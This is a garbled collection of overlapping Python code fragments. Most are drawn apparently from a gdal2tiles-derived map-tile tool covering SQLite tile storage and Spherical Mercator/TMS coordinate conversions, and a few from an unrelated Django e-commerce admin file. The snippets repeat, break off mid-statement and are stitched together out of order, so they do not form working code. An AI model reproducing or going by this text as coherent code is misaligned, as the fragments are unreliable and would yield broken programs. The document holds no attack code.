database. 
Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0", "for generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global", "lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx = lon", "\"\"\" Create a new storage file, overwrite or not if already exists\"\"\" self.filename=filename", "else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE", "sqlite with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur", "grayscale, one alpha mask import sqlite3 import os import math __version__ = \"$Id:", "> 500 or force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image)", "level resolution is always divided by two initialResolution = 20037508.342789244 * 2 /", "maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) :", "to top-left corner of the extent return tx, (2**zoom - 1) - ty", "the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi", "500 or force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\", "2008, project GDAL2Tiles for OSGEO. 
In case you use this class in your", "#!/usr/bin/env python #****************************************************************************** # From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ #", "Create a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS')", "force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)',", "EPSG:900913\" mx = lon * self.originShift / 180.0 my = math.log( math.tan((90 +", "OpenLayers Base Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation", "\"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for generation of tiles in", "I create a raster in EPSG:900913 and convert coordinates with PROJ.4? You can", "\"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\"", "the extra precision of an ellipsoidal projection. The spherical projection causes approximately 0.33", "TMS notation (origin [0,0] in bottom-left). 
What coordinate conversions do we need for", "tiles ( x int, y int, z int, s int, image blob, PRIMARY", "on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles", "def TileBounds(self, tx, ty, zoom): \"Returns bounds of the given tile in EPSG:900913", "* math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift", "point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx", "AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask import sqlite3 import os", "KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info ( desc TEXT,", "Google Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326)", "the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return", "for given mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile(", "projection is used only for map display, and not for displaying numeric coordinates,", "IF NOT EXISTS tiles ( x int, y int, z int, s int,", "filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename)", "TileMapService What is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244,", "1 grayscale, one alpha mask import sqlite3 import os import math __version__ =", "clients like Google Maps are projecting those coordinates by Spherical Mercator, so in", "int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s)", "\\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y, z)", "into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None", "spherical form of projection, not the ellipsoidal form. 
Since the projection is used", "self.db.cursor() cur.execute(\"select image from tiles where x=? and y=? and z=?\", (x, y,", "in your product, translate it to another language or find it usefull for", "<< zoom py = mapSize - pyr res = self.Resolution( zoom ) mx", "global tiles used on the web. It contains classes implementing coordinate conversions for:", "(origin [0,0] in bottom-left). What coordinate conversions do we need for TMS Global", "WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx = lon * self.originShift", "on the web. It contains classes implementing coordinate conversions for: - GlobalMercator (based", "the top-left corner, reference is XYZ. Microsoft is referencing tiles by a QuadTree", "py = (my + self.originShift) / res mapSize = self.tileSize << zoom return", "- y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new", "In fact you can calculate the constant as: 2 * math.pi * 6378137", "math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift =", "The same projection is degined as EPSG:3785. WKT definition is in the official", "[] def open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename):", "new storage file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite:", "you can overlay them on top of base maps of those web mapping", "of extent. 
In fact you can calculate the constant as: 2 * math.pi", "cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT,", "px, mapSize - py def PixelsToTile(self, px, py): \"Returns a tile covering region", "(equal extent, projection, pixel size), there is just different identification of the same", "return True else: return False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info", "z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE", "image = str(res[0]) return image else : print (\"None found\") return None def", "different identification of the same raster tile. Tiles in TMS are counted from", "tiles used on the web. It contains classes implementing coordinate conversions for: -", "= self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon)", ") maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny,", "coordinate conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps,", "Class is available under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32", "projection, pixel size), there is just different identification of the same raster tile.", "with PROJ.4? 
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.", "covering region in given pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize)", "/ 360.0 )) / (math.pi / 180.0) my = my * self.originShift /", "storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom = None self.written = set()", "pixels tile, every lower zoom level resolution is always divided by two initialResolution", "- ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates to", "/ self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift = 2 * math.pi", "self.originShift my = py * res - self.originShift return mx, my def MetersToPixels(self,", "Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]],", "IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int)", "return False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom =", "overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering scheme from a TMS", "latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon =", "2 * math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels", "# coordinate origin is moved from bottom-left to top-left corner of the extent", "at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. WKT definition is in", "if len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert into tiles (z,", "extent of Earth in EPSG:900913? 
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from", "z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles", "exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db", "dot cz. I would like to know where it was used. Class is", "2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO. In case you", "self.originShift) / res py = (my + self.originShift) / res mapSize = self.tileSize", "tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance", "if (ty & mask) != 0: digit += 2 quadKey += str(digit) return", "Maps, UK Ordnance Survey OpenSpace API, ... and you can overlay them on", "is XYZ. Microsoft is referencing tiles by a QuadTree name, defined on the", "res = self.Resolution( zoom ) px = (mx + self.originShift) / res py", "is referencing tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The", "minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon,", "single tile from a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x,", "a tile covering region in given pixel coordinates\" tx = int( math.ceil( px", "256 = 156543.03392804062 What is the difference between TMS and Google Maps/QuadTree tile", "= z if self.maxzoom is None or z > self.maxzoom: self.maxzoom = z", "18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\"", "False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?),", "= self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ 
values (?,?,?,?,?)', self.pending_images) self.pending_images", "math.pi * 6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326", "pyramid lat/lon XY in metres XY pixels Z zoom XYZ from TMS EPSG:4326", "The tile raster itself is the same (equal extent, projection, pixel size), there", "self.maxzoom is None or z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self,", "(self.type, )) self.minzoom = None self.maxzoom = None self.written = set() self.db.commit() self.pending_images", "WGS84 Geodetic Datum. Well, the web clients like Google Maps are projecting those", "_ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx,", "simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create", "def writeImage(self, x, y, z, image) : \"\"\" write a single tile from", "Sqlite files methods for simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self,", "p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1,", "top of pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom level", "(ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx,", "the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection", "EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if", "tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates", "for displaying numeric coordinates, we don't need the extra precision of an ellipsoidal", "compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace", "coordinates on sphere are treated as if the were on the WGS84 ellipsoid.", "ty, zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\"", 
"__version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite", "pixel coordinates to top-left corner\" # # mapSize = self.tileSize << zoom #", "p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level", "klokan dot cz. I would like to know where it was used. Class", "in metres XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. ---------", "EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0],", "overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys", "for generation of global tiles used on the web. It contains classes implementing", "px, py, zoom): # \"Move the origin of pixel coordinates to top-left corner\"", "translate it to another language or find it usefull for your project please", "$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come", "my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level\" res", "self.commitData() def commitData(self, force = False): if len(self.pending_images) > 500 or force: cur", "self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db =", "Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers", "coordinates to top-left corner\" # # mapSize = self.tileSize << zoom # return", "coordinate conversions do we need for TMS Global Mercator tiles:: LatLon <-> Meters", "Web Clients TileMapService What is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244,", "of the same raster tile. 
Tiles in TMS are counted from [0,0] in", "a new sqlite with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname,", "x int, y int, z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\")", "in pyramid Tiles in pyramid lat/lon XY in metres XY pixels Z zoom", "(TMS) Profiles ============================================================== Functions necessary for generation of global tiles used on the", "Service (TMS) Profiles ============================================================== Functions necessary for generation of global tiles used on", "bottom-left). What coordinate conversions do we need for TMS Global Mercator tiles:: LatLon", "z)) res = cur.fetchone() if res: image = str(res[0]) return image else :", "* 6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs", "new sqlite with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite)", "other GIS programs check the exact definition of the projection: More info at", "close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom =", "res: xx= x zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z)", "256x256 pixels tile, every lower zoom level resolution is always divided by two", "self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom )", "given pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize) ) - 1", "\"\" ty = (2**zoom - 1) - ty for i in range(zoom, 0,", "the calculations, we use the spherical form of projection, not the ellipsoidal form.", "len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x,", "to lat/lon in WGS84 Datum\" lon = (mx / self.originShift) * 180.0 lat", "the circumference of the Earth in meters, which is 40 thousand kilometers, the", "self.minzoom: 
self.minzoom = z if self.maxzoom is None or z > self.maxzoom: self.maxzoom", "scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x,", "level (measured at Equator)\" # return (2 * math.pi * 6378137) / (self.tileSize", "os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x,", "GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator", "All of the tools supports -t_srs 'epsg:900913'. For other GIS programs check the", "don't want to scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile", "divided by two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What", "tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])", "= (2**zoom - 1) - ty for i in range(zoom, 0, -1): digit", "85.05112878 are clipped off. What are zoom level constants (pixels/meter) for pyramid with", "\"\"\" if (x, y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x,", "\"Returns bounds of the given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters(", "use WGS84 Geodetic Datum. Well, the web clients like Google Maps are projecting", "and not for displaying numeric coordinates, we don't need the extra precision of", "Microsoft is referencing tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx", "(?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y, z) : \"\"\"", "use the spherical form of projection, not the ellipsoidal form. 
Since the projection", "MODIFIED FROM ORIGINAL, come with no warranty # <NAME> # input: vrt file", "in WGS84 Datum\" lon = (mx / self.originShift) * 180.0 lat = (my", "yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles", "desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\"", "\"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite", "sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur", "WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we use the spherical", ": \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return", "new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in", "tile raster itself is the same (equal extent, projection, pixel size), there is", "Pixels in pyramid Tiles in pyramid lat/lon XY in metres XY pixels Z", "# <NAME> # input: vrt file (-addalpha) in 3857 projection (projection is forced", "a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z, image)", "coordinates in given zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize <<", "covered by 256x256 pixels tile, every lower zoom level resolution is always divided", "/ (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal", "\"\"\" write a single tile from a file \"\"\" self.writeImage(x, y, z, f.read())", "self.db = sqlite3.connect(self.filename) return True else: 
return False def close(self): self.commitData(force=True) cur =", "write a single tile from a file \"\"\" self.writeImage(x, y, z, f.read()) def", "Profiles ============================================================== Functions necessary for generation of global tiles used on the web.", "for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps,", "return image else : print (\"None found\") return None def createFromDirectory(self, filename, basedir,", "* math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def", "info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. WKT definition is", "17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname,", "self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid", "EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\ <-> | | <-> /----/", "of the extent return tx, (2**zoom - 1) - ty def QuadTree(self, tx,", "placed the origin [0,0] to the top-left corner, reference is XYZ. Microsoft is", "target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res =", "the same raster tile. Tiles in TMS are counted from [0,0] in the", "def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering scheme", "in pyramid lat/lon XY in metres XY pixels Z zoom XYZ from TMS", "\"\"\" Create a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\"", "sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles (", "self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z, image) : \"\"\" write", "and Google Maps/QuadTree tile name convention? 
The tile raster itself is the same", "math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi / 180.0) my", "from tiles\") res = cur.fetchall() for (x, y, z) in res: xx= x", "2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of", "http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles", "# input: vrt file (-addalpha) in 3857 projection (projection is forced due #", "<< zoom return px, mapSize - py def PixelsToTile(self, px, py): \"Returns a", "target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res", "a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z", "zoom): # \"Move the origin of pixel coordinates to top-left corner\" # #", "GDAL2Tiles for OSGEO. In case you use this class in your product, translate", "raster tile. Tiles in TMS are counted from [0,0] in the bottom-left corner,", "off. What are zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole region", "/ float(self.tileSize) ) - 1 ) ty = int( math.ceil( py / float(self.tileSize)", "> self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force = False): if len(self.pending_images)", "set() self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\" Open an existing", "pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS /", "projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. 
Such tiles are compatible", "TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom", "display, and not for displaying numeric coordinates, we don't need the extra precision", "256 pixels self.originShift = 2 * math.pi * 6378137 / 2.0 # 20037508.342789244", "ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon,", "+y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps", "self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or", "self.minzoom = None self.maxzoom = None self.written = set() self.db.commit() self.pending_images = []", "p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for", "WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563,", "p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _", "globalmaptiles.py Global Map Tiles as defined in Tile Map Service (TMS) Profiles ==============================================================", ") ty = int( math.ceil( py / float(self.tileSize) ) - 1 ) return", "miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize,", "readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS", "do I create a raster in EPSG:900913 and convert coordinates with PROJ.4? 
You", "2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon", "px / float(self.tileSize) ) - 1 ) ty = int( math.ceil( py /", "(i-1) if (tx & mask) != 0: digit += 1 if (ty &", "cur.fetchall() for (x, y, z) in res: xx= x zz= z yy= 2**zz", "is on top of pyramid (zoom=0) covered by 256x256 pixels tile, every lower", "-t_srs 'epsg:900913'. For other GIS programs check the exact definition of the projection:", "of pixel coordinates to top-left corner\" # # mapSize = self.tileSize << zoom", "/ 180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, pyr,", "TMS and Google Maps/QuadTree tile name convention? The tile raster itself is the", "minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds", "in given zoom level\" res = self.Resolution( zoom ) px = (mx +", "x, y,image) \\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self,", "from string \"\"\" if (x, y, z) in self.written: return self.written.add((x, y, z))", "of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]],", "y, z) : \"\"\" read a single tile as string \"\"\" cur =", "tile from string \"\"\" if (x, y, z) in self.written: return self.written.add((x, y,", "coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters(", "self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\",", "| <-> /----/ <-> Google \\ / | | /--------/ QuadTree ----- ---------", "def MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical Mercator EPSG:900913 to", "Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible with Google Maps, Microsoft Virtual Earth,", "noticable. 
How do I create a raster in EPSG:900913 and convert coordinates with", "quadKey = \"\" ty = (2**zoom - 1) - ty for i in", "BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor()", "for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84" ]
[ "= ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3", "from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile,", "readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount',", "= ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon']", "readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy =", "@admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund", "'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact)", "class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity',", "'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}),", "'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display =", "'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\"", "Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size #", "django.contrib import 
admin from django.utils.html import format_html # from django.contrib.auth.models import Group from", "'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted]", "5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type',", "@admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted',", "# admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name',", "('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2',", "search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields", "ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price',", "list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions =", "to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields", "['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct)", "import Group from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting,", "Status', {'fields': 
